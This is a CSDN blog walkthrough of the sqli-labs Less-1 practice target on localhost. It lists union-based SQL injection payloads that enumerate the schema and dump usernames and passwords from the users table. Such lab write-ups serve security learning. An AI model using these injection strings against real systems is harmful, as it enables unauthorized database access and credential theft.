SQL注入实例(sqli-labs/less-1)

最新推荐文章于 2024-08-04 00:20:39 发布
最新推荐文章于 2024-08-04 00:20:39 发布
阅读量443 收藏 4
点赞数 6
分类专栏: sql靶场练习 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thewei666/article/details/138538063
版权

初始网页

从网页可知传递的参数名为 id,并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数(效率低)
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+

1.2 使用order by查找列数(效率高)
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

 2、查看回显位置

?id=-1' union select 1,2,3 --+

3、查询当前数据库名

?id=-1' union select 1,database(),3 --+

4、查询当前表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

 

其他

查询当前数据库版本

?id=-1' union select 1,version(),3 --+

查询当前登录用户

?id=-1' union select 1,user(),3 --+

魏大橙
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2824
sqli-labs靶场之前建议补一下基础。
SQL注入sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 5953
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2506
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
SQL注入实例sqli-labs/less-3)
Thewei666的博客
08-04 350
确定为字符型注入确定闭合字符为 ‘)
SQL注入实例sqli-labs/less-2)
Thewei666的博客
08-03 78
当没有闭合符号进行注释时,网页并没有报错,所以可以确定无闭合符号,为数值型注入。
SQL注入实例sqli-labs/less-4)
最新发布
Thewei666的博客
08-04 27
前两条判断是否为数值型注入,后两条判断字符型注入的闭合符号。
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6289
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
sqli-labs注入靶场实例
信安是不可或缺的一部分!
10-24 629
对比Less-1可以看出Less-1使用双引号包裹语句,而Less-2没有使用符号包裹语句,而Less-3使用”)进行闭合。建议使用手动注入,手动注入可以更加了解到sql注入的原理,使用工具可以更快的查询到数据新手不推荐使用工具。我们使用)–+注释后面的语句就会变成id=1‘)–+‘),注释符后面的语句不会执行,这样就找到了注入方法。方法与上面相同,这里直接引用Less-1的语句即可注意id=1后没有单引号。id=1’)) --+,回显结果正确。-D 爆指定数据库表 --tables。
Sqli-labs之Less-5和Less-6
m0_46315342的博客
06-04 933
      这两关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回 you are in....,不会返回数据库当中的信息了(但会print_f(mysql_error()),这点很重要),所以我们不能利用前面 less1-4 的方法。 我们对比...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
MySQL:初识数据库&初识SQL&建库
2401_83595513的博客
07-31 952
MySQL&数据库服务&数据库&SQL
简单的 mongoDB 学习
qq_19342829的博客
07-31 497
mongodb入门学习整理
社区养老服务小程序的设计
Karen198的博客
07-31 515
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1182
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
sqli-labs/Less-28
01-09
sqli-labs是一个用于学习和实践SQL注入的实验平台。Less-28是其中的一个实验,它是基于GET请求的盲注注入漏洞。在这个实验中,我们需要利用字符串单引号和括号来进行注入。 具体步骤如下: 1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了所有的数据,那么注入成功。 请注意,这只是一个简单的示例,实际的注入攻击可能更加复杂和危险。在进行任何形式的注入测试时,请确保已经获得了合法的授权,并且只在受控的环境中进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值